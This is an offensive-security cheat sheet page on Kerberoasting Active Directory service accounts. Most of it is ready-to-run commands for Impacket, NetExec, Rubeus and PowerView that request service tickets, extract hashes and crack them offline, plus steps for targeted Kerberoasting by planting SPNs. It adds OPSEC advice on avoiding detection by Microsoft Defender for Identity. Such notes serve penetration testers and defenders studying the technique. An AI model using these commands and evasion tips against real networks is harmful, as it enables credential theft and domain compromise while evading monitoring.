Kerberoasting

Typically, Kerberoasting happens after compromising a domain user. However, according to new research, it is possible to perform this attack with an account susceptible to ASREPRoast! For an example of this attack vector check Rebound.

OPSEC: Kerberoasting is a very silent attack; only one logged entry is created when requesting the ST (4769). There are typically thousands of those events on a DC per day.

Kerberoasting is an attack on the Service Ticket (ST) and Service Principal Names (SPNs). SPNs are unique IDs that Kerberos uses to map a service instance, for example MySQL, to a service sign-in account, such as svc_mysql, in whose, often privileged, context the service is running. The ST is encrypted with the service's account NTLM hash, so it can potentially be cracked. Any domain user can request a ST from the DC for any SPN account.

Accounts like krbtgt, machine accounts (e.g. dc01$), and (g)MSAs are usually resistant due to complex, long passwords.

Tools

Find and attack user accounts used as service accounts with Impacket:

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain>/<user> -outputfile <fileName>

# Kerberoast an account susceptible to ASREPRoasting
sudo impacket-GetUserSPNs -no-preauth jjones -usersfile domain_users -dc-host 10.10.11.231 rebound.htb/ -outputfile kerb.txt

If time sync errors occur, i.e., KRB_AP_ERR_SKEW(Clock skew too great):

sudo ntpdate <dc-ip>

Find and attack user accounts used as service accounts with NetExec:

# Kerberoast with NetExec
nxc ldap 192.168.0.104 -u user -p pass --kerberoasting output.txt

If time sync errors occur, i.e., KRB_AP_ERR_SKEW(Clock skew too great):

sudo ntpdate <dc-ip>

For an example of Kerberoasting using NetExec see Active.

OPSEC: To evade detection mechanisms that flag Kerberos encryption downgrades, like MDI, focus on service accounts that are configured to support only RC4-HMAC. Requesting a service ticket for them using RC4 appears legitimate and does not trigger downgrade alerts. In addition, try to Kerberoast a single user at a time as this is not seen as an anomaly and won't trigger alerts. E.g. .\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

Find user accounts used as service accounts with Rubeus:

# List Kerberoastable accounts
.\Rubeus.exe kerberoast /stats

Execute the attack:

# Kerberoast all SPNs and extract TGS-REP hashes
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast /format:hashcat /nowrap

# Kerberoast a single user
.\Rubeus.exe kerberoast /user:svcadmin /simple

# Kerberoast the target account using explicit credentials
.\Rubeus.exe kerberoast /creduser:domain\user1 /credpassword:pass /user:targetUser /outfile:hash.txt /format:hashcat /nowrap

# Kerberoast an account susceptible to ASREPRoasting with Rubeus
.\Rubeus.exe kerberoast /domain:<domain> /dc:<ip> /nopreauth:<user> /spns:<username-list>

For an example of Kerberoasting using Rubeus see Sizzle.

Find user accounts used as service accounts with PowerView:

# Enumerate SPNs
Get-DomainUser * -SPN | select samaccountname,serviceprincipalname

Execute the attack:

# Kerberoast the enumerated accounts
Get-DomainUser * -SPN -verbose |  Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_spns.csv -NoTypeInformation

# Kerberoast the target account
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Kerberoast the target account and extract the hash
Get-DomainUser -Identity svc_mssql | Get-DomainSPNTicket -Format Hashcat | ForEach-Object { $_.Hash -replace '\s+', '' }

Optionally, we can clear the SPNs of the target account:

# Clear the SPNs of the target account
Set-DomainObject -Identity sqldev -Clear serviceprincipalname

Find user accounts used as service accounts with the ActiveDirectory module:

# Enumerate SPNs with AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalName

The krb5tgs hashes can be cracked offline using Hashcat or JtR:

# Crack the hashes using Hashcat
sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Crack the hashes using John the Ripper
.\john.exe --wordlist=<wordlist> hashes.kerberoast

Targeted Kerberoast

If we have GenericWrite or GenericAll on a user object, we can set an SPN on that user account and then extract and crack the TGS.

OPSEC: Clean up by removing the SPN afterwards.

Set a SPN for the target user (must be unique for the forest) using PowerView or the ActiveDirectory module:

# PowerView
Set-DomainObject -Identity <targetUser> -Set @{serviceprincipalname='<serviceName>/<randomString>'}

# AD module
Set-ADUser -Identity <targetUser> -ServicePrincipalNames @{Add='<serviceName>/<randomString>'}

Resources

An amazing demonstration of Kerberoasting (video)
What impacket-GetUserSPNs does behind the scenes (video)
Siegecast's lecture on Kerberoasting (video)
An in-depth adsecurity article about Kerberoasting (article)

PreviousGPOddity NextLocal SAM Dump

Last updated 4 months ago

Was this helpful?

hashtagTools

hashtagTargeted Kerberoast

hashtagResources

Tools

Targeted Kerberoast

Resources